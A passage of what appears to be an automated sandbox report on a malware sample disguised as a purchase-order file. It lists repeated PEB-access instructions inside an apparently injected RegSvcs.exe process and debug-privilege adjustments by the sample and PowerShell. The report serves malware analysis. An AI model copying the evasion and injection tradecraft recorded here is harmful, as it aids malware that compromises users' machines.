                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A260B mov eax, dword ptr fs:[00000030h] 8_2_015A260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A260B mov eax, dword ptr fs:[00000030h] 8_2_015A260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A260B mov eax, dword ptr fs:[00000030h] 8_2_015A260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A260B mov eax, dword ptr fs:[00000030h] 8_2_015A260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A260B mov eax, dword ptr fs:[00000030h] 8_2_015A260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A260B mov eax, dword ptr fs:[00000030h] 8_2_015A260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160E609 mov eax, dword ptr fs:[00000030h] 8_2_0160E609
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0159262C mov eax, dword ptr fs:[00000030h] 8_2_0159262C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C6620 mov eax, dword ptr fs:[00000030h] 8_2_015C6620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C8620 mov eax, dword ptr fs:[00000030h] 8_2_015C8620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015AE627 mov eax, dword ptr fs:[00000030h] 8_2_015AE627
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016106F1 mov eax, dword ptr fs:[00000030h] 8_2_016106F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016106F1 mov eax, dword ptr fs:[00000030h] 8_2_016106F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160E6F2 mov eax, dword ptr fs:[00000030h] 8_2_0160E6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160E6F2 mov eax, dword ptr fs:[00000030h] 8_2_0160E6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160E6F2 mov eax, dword ptr fs:[00000030h] 8_2_0160E6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160E6F2 mov eax, dword ptr fs:[00000030h] 8_2_0160E6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CA6C7 mov ebx, dword ptr fs:[00000030h] 8_2_015CA6C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CA6C7 mov eax, dword ptr fs:[00000030h] 8_2_015CA6C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01594690 mov eax, dword ptr fs:[00000030h] 8_2_01594690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01594690 mov eax, dword ptr fs:[00000030h] 8_2_01594690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C66B0 mov eax, dword ptr fs:[00000030h] 8_2_015C66B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CC6A6 mov eax, dword ptr fs:[00000030h] 8_2_015CC6A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01634978 mov eax, dword ptr fs:[00000030h] 8_2_01634978
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01634978 mov eax, dword ptr fs:[00000030h] 8_2_01634978
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0161C97C mov eax, dword ptr fs:[00000030h] 8_2_0161C97C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01664940 mov eax, dword ptr fs:[00000030h] 8_2_01664940
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01610946 mov eax, dword ptr fs:[00000030h] 8_2_01610946
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015D096E mov eax, dword ptr fs:[00000030h] 8_2_015D096E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015D096E mov edx, dword ptr fs:[00000030h] 8_2_015D096E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015D096E mov eax, dword ptr fs:[00000030h] 8_2_015D096E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B6962 mov eax, dword ptr fs:[00000030h] 8_2_015B6962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B6962 mov eax, dword ptr fs:[00000030h] 8_2_015B6962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B6962 mov eax, dword ptr fs:[00000030h] 8_2_015B6962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01588918 mov eax, dword ptr fs:[00000030h] 8_2_01588918
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01588918 mov eax, dword ptr fs:[00000030h] 8_2_01588918
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0162892B mov eax, dword ptr fs:[00000030h] 8_2_0162892B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0161892A mov eax, dword ptr fs:[00000030h] 8_2_0161892A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160E908 mov eax, dword ptr fs:[00000030h] 8_2_0160E908
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160E908 mov eax, dword ptr fs:[00000030h] 8_2_0160E908
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0161C912 mov eax, dword ptr fs:[00000030h] 8_2_0161C912
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0161E9E0 mov eax, dword ptr fs:[00000030h] 8_2_0161E9E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0159A9D0 mov eax, dword ptr fs:[00000030h] 8_2_0159A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0159A9D0 mov eax, dword ptr fs:[00000030h] 8_2_0159A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0159A9D0 mov eax, dword ptr fs:[00000030h] 8_2_0159A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0159A9D0 mov eax, dword ptr fs:[00000030h] 8_2_0159A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0159A9D0 mov eax, dword ptr fs:[00000030h] 8_2_0159A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0159A9D0 mov eax, dword ptr fs:[00000030h] 8_2_0159A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C49D0 mov eax, dword ptr fs:[00000030h] 8_2_015C49D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016269C0 mov eax, dword ptr fs:[00000030h] 8_2_016269C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C29F9 mov eax, dword ptr fs:[00000030h] 8_2_015C29F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C29F9 mov eax, dword ptr fs:[00000030h] 8_2_015C29F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165A9D3 mov eax, dword ptr fs:[00000030h] 8_2_0165A9D3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016189B3 mov esi, dword ptr fs:[00000030h] 8_2_016189B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016189B3 mov eax, dword ptr fs:[00000030h] 8_2_016189B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016189B3 mov eax, dword ptr fs:[00000030h] 8_2_016189B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015909AD mov eax, dword ptr fs:[00000030h] 8_2_015909AD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015909AD mov eax, dword ptr fs:[00000030h] 8_2_015909AD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h] 8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h] 8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h] 8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h] 8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h] 8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h] 8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h] 8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h] 8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h] 8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h] 8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h] 8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h] 8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h] 8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01594859 mov eax, dword ptr fs:[00000030h] 8_2_01594859
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01594859 mov eax, dword ptr fs:[00000030h] 8_2_01594859
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015C0854 mov eax, dword ptr fs:[00000030h] 8_2_015C0854
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01626870 mov eax, dword ptr fs:[00000030h] 8_2_01626870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01626870 mov eax, dword ptr fs:[00000030h] 8_2_01626870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0161E872 mov eax, dword ptr fs:[00000030h] 8_2_0161E872
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0161E872 mov eax, dword ptr fs:[00000030h] 8_2_0161E872
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A2840 mov ecx, dword ptr fs:[00000030h] 8_2_015A2840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0163483A mov eax, dword ptr fs:[00000030h] 8_2_0163483A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0163483A mov eax, dword ptr fs:[00000030h] 8_2_0163483A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CA830 mov eax, dword ptr fs:[00000030h] 8_2_015CA830
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B2835 mov eax, dword ptr fs:[00000030h] 8_2_015B2835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B2835 mov eax, dword ptr fs:[00000030h] 8_2_015B2835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B2835 mov eax, dword ptr fs:[00000030h] 8_2_015B2835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B2835 mov ecx, dword ptr fs:[00000030h] 8_2_015B2835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B2835 mov eax, dword ptr fs:[00000030h] 8_2_015B2835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B2835 mov eax, dword ptr fs:[00000030h] 8_2_015B2835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0161C810 mov eax, dword ptr fs:[00000030h] 8_2_0161C810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165A8E4 mov eax, dword ptr fs:[00000030h] 8_2_0165A8E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015BE8C0 mov eax, dword ptr fs:[00000030h] 8_2_015BE8C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CC8F9 mov eax, dword ptr fs:[00000030h] 8_2_015CC8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015CC8F9 mov eax, dword ptr fs:[00000030h] 8_2_015CC8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016608C0 mov eax, dword ptr fs:[00000030h] 8_2_016608C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01590887 mov eax, dword ptr fs:[00000030h] 8_2_01590887
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0161C89D mov eax, dword ptr fs:[00000030h] 8_2_0161C89D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01588B50 mov eax, dword ptr fs:[00000030h] 8_2_01588B50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01638B42 mov eax, dword ptr fs:[00000030h] 8_2_01638B42
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01626B40 mov eax, dword ptr fs:[00000030h] 8_2_01626B40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01626B40 mov eax, dword ptr fs:[00000030h] 8_2_01626B40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0165AB40 mov eax, dword ptr fs:[00000030h] 8_2_0165AB40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0158CB7E mov eax, dword ptr fs:[00000030h] 8_2_0158CB7E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01644B4B mov eax, dword ptr fs:[00000030h] 8_2_01644B4B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01644B4B mov eax, dword ptr fs:[00000030h] 8_2_01644B4B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01662B57 mov eax, dword ptr fs:[00000030h] 8_2_01662B57
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01662B57 mov eax, dword ptr fs:[00000030h] 8_2_01662B57
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01662B57 mov eax, dword ptr fs:[00000030h] 8_2_01662B57
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01662B57 mov eax, dword ptr fs:[00000030h] 8_2_01662B57
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0163EB50 mov eax, dword ptr fs:[00000030h] 8_2_0163EB50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01658B28 mov eax, dword ptr fs:[00000030h] 8_2_01658B28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01658B28 mov eax, dword ptr fs:[00000030h] 8_2_01658B28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01664B00 mov eax, dword ptr fs:[00000030h] 8_2_01664B00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015BEB20 mov eax, dword ptr fs:[00000030h] 8_2_015BEB20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015BEB20 mov eax, dword ptr fs:[00000030h] 8_2_015BEB20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h] 8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h] 8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h] 8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h] 8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h] 8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h] 8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h] 8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h] 8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h] 8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B0BCB mov eax, dword ptr fs:[00000030h] 8_2_015B0BCB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B0BCB mov eax, dword ptr fs:[00000030h] 8_2_015B0BCB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015B0BCB mov eax, dword ptr fs:[00000030h] 8_2_015B0BCB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0161CBF0 mov eax, dword ptr fs:[00000030h] 8_2_0161CBF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01590BCD mov eax, dword ptr fs:[00000030h] 8_2_01590BCD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01590BCD mov eax, dword ptr fs:[00000030h] 8_2_01590BCD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01590BCD mov eax, dword ptr fs:[00000030h] 8_2_01590BCD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015BEBFC mov eax, dword ptr fs:[00000030h] 8_2_015BEBFC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01598BF0 mov eax, dword ptr fs:[00000030h] 8_2_01598BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01598BF0 mov eax, dword ptr fs:[00000030h] 8_2_01598BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01598BF0 mov eax, dword ptr fs:[00000030h] 8_2_01598BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0163EBD0 mov eax, dword ptr fs:[00000030h] 8_2_0163EBD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01644BB0 mov eax, dword ptr fs:[00000030h] 8_2_01644BB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01644BB0 mov eax, dword ptr fs:[00000030h] 8_2_01644BB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0BBE mov eax, dword ptr fs:[00000030h] 8_2_015A0BBE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0BBE mov eax, dword ptr fs:[00000030h] 8_2_015A0BBE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0A5B mov eax, dword ptr fs:[00000030h] 8_2_015A0A5B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_015A0A5B mov eax, dword ptr fs:[00000030h] 8_2_015A0A5B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0163EA60 mov eax, dword ptr fs:[00000030h] 8_2_0163EA60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h] 8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h] 8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h] 8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h] 8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h] 8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h]8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h]8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160CA72 mov eax, dword ptr fs:[00000030h]8_2_0160CA72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160CA72 mov eax, dword ptr fs:[00000030h]8_2_0160CA72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CCA6F mov eax, dword ptr fs:[00000030h]8_2_015CCA6F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CCA6F mov eax, dword ptr fs:[00000030h]8_2_015CCA6F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CCA6F mov eax, dword ptr fs:[00000030h]8_2_015CCA6F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B4A35 mov eax, dword ptr fs:[00000030h]8_2_015B4A35
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B4A35 mov eax, dword ptr fs:[00000030h]8_2_015B4A35
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161CA11 mov eax, dword ptr fs:[00000030h]8_2_0161CA11
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BEA2E mov eax, dword ptr fs:[00000030h]8_2_015BEA2E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CCA24 mov eax, dword ptr fs:[00000030h]8_2_015CCA24
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01590AD0 mov eax, dword ptr fs:[00000030h]8_2_01590AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C4AD0 mov eax, dword ptr fs:[00000030h]8_2_015C4AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C4AD0 mov eax, dword ptr fs:[00000030h]8_2_015C4AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015E6ACC mov eax, dword ptr fs:[00000030h]8_2_015E6ACC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015E6ACC mov eax, dword ptr fs:[00000030h]8_2_015E6ACC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015E6ACC mov eax, dword ptr fs:[00000030h]8_2_015E6ACC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CAAEE mov eax, dword ptr fs:[00000030h]8_2_015CAAEE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CAAEE mov eax, dword ptr fs:[00000030h]8_2_015CAAEE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C8A90 mov edx, dword ptr fs:[00000030h]8_2_015C8A90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159EA80 mov eax, dword ptr fs:[00000030h]8_2_0159EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159EA80 mov eax, dword ptr fs:[00000030h]8_2_0159EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159EA80 mov eax, dword ptr fs:[00000030h]8_2_0159EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159EA80 mov eax, dword ptr fs:[00000030h]8_2_0159EA80
Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
